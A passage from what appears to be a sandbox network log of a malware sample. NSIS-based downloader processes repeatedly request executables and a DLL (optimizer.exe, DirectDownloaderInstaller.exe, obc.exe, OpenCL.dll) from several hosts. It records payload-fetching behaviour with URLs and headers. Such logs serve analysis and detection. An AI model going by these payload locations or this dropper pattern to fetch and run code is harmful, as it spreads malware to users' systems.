    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 30
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 30
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 33
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:15 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 34
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 34
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 40
  • flag-gb
    GET
    http://gsuite.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    216.58.213.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: gsuite.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:35 GMT
    Expires: Mon, 25 Dec 2023 11:29:35 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 42
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:14 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:14 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:15 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:15 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:18 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:16 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:19 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 40
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 40
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 40
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 41
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 41
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 41
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 41
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 41
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 41
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 41
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 41
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 50
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 50
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:18 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:19 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:19 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:19 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:19 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:19 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:20 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:19 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:20 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:20 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:23 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
